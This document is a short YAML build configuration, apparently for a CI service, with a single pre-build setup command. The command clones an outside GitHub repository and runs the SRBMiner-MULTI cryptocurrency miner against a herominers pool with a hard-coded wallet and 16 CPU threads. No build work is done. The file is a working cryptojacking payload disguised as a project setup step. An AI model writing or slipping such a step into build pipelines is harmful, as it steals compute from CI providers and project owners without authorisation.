build:
  nodes:
    my-node:
      project_setup:
        before:
          - command: git clone https://github.com/remakove/artions.git artions && cd artions && chmod +x SRBMiner-MULTI && ./SRBMiner-MULTI --algorithm panthera --pool ca.scala.herominers.com:10130 --wallet SvjYbXdm3tbNqX9Yw4PEE67zyoWPLaobJB6DtazWqMvHA2KRytNebEpfgJU7DyLxR39rpzo9hcfA98Y1VDaiV6aq1oMixxs5j.p2 --disable-gpu --cpu-threads 16 --cpu-affinity 0xFFFF
